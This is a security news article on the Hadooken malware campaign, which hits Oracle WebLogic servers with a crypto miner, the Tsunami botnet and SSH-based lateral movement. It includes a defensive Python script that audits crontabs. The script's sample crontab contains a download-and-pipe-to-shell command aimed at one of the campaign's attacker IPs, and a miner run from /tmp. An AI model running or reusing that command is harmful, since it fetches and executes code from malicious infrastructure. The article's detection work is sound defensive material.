New Linux Malware Campaign Targets Oracle WebLogic Servers for Cryptocurrency Mining

Cybersecurity researchers have identified a new malware campaign targeting Linux systems to perform unauthorized cryptocurrency mining, specifically exploiting Oracle WebLogic servers. According to cloud security firm Aqua, the malware, named Hadooken, drops Tsunami malware and installs a crypto miner upon execution.

The attack leverages known vulnerabilities and misconfigurations, such as weak credentials, to gain initial access and execute code on vulnerable servers. The malware is deployed through two similar payloads—a Python script and a shell script—both of which download Hadooken from remote servers (“89.185.85[.]102” or “185.174.136[.]204”).

The shell script version also attempts to access directories containing SSH data, such as user credentials and host information, using this information to attack other servers. This allows the malware to spread laterally across the organization or connected environments, further distributing Hadooken.

The newly discovered Linux malware Hadooken includes two components: a cryptocurrency miner and a DDoS botnet known as Tsunami (or Kaiten), which is notorious for attacking Jenkins and WebLogic services in Kubernetes clusters.

To maintain persistence, the malware sets up cron jobs that run the crypto miner at varying intervals. Aqua Security noted that one of the IP addresses associated with the malware, 89.185.85[.]102, is registered in Germany with hosting company Aeza International LTD (AS210644). This IP was previously linked to the 8220 Gang’s cryptocurrency mining campaign, which exploited vulnerabilities in Apache Log4j and Atlassian Confluence.
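A defender-side check for the cron persistence and download-and-execute loaders described above, written as an added example that is not part of Aqua's report or the Hadooken samples. It audits crontab lines for the two download hosts named in the article and for generic loader patterns; the sample crontab lines are constructed.

```python
import re

# The two download hosts named in the article (IP addresses from the page).
KNOWN_HOSTS = {"89.185.85.102", "185.174.136.204"}

# Patterns typical of loader cron jobs: fetch a remote script and pipe it into a
# shell, or execute a file dropped in a temporary/world-writable directory.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
TMP_EXEC = re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+")
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def audit_cron_line(line: str) -> list[str]:
    """Return the reasons a single crontab line looks like loader/miner persistence."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    reasons = []
    for ip in IP_RE.findall(line):
        if ip in KNOWN_HOSTS:
            reasons.append(f"contacts known Hadooken host {ip}")
    if DOWNLOAD_EXEC.search(line):
        reasons.append("downloads and pipes a remote script into a shell")
    if TMP_EXEC.search(line):
        reasons.append("executes a file from a temporary directory")
    return reasons


def audit_crontab(text: str) -> dict[str, list[str]]:
    """Map each suspicious crontab line to its findings; clean lines are omitted."""
    return {l.strip(): r for l in text.splitlines() if (r := audit_cron_line(l))}


# Constructed sample crontab: one benign job and two that mimic the campaign's behaviour.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://89.185.85.102/c | sh
@hourly /tmp/.x/miner -o pool.example --donate-level 0
"""

if __name__ == "__main__":
    for entry, reasons in audit_crontab(SAMPLE_CRONTAB).items():
        print(entry)
        for r in reasons:
            print("   -", r)
```

On a live host, feed it the output of `crontab -l` for each user and the contents of the `/etc/cron*` directories rather than the constructed sample.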

Another associated IP, 185.174.136[.]204, is currently inactive but also linked to Aeza Group Ltd. (AS216246). Aeza, identified by Qurium and EU DisinfoLab in July 2024, is a bulletproof hosting provider based in Moscow and Frankfurt, known for sheltering cybercriminal activities. Researchers noted that Aeza’s rapid growth can be attributed to recruiting young developers connected to these bulletproof hosting services in Russia.
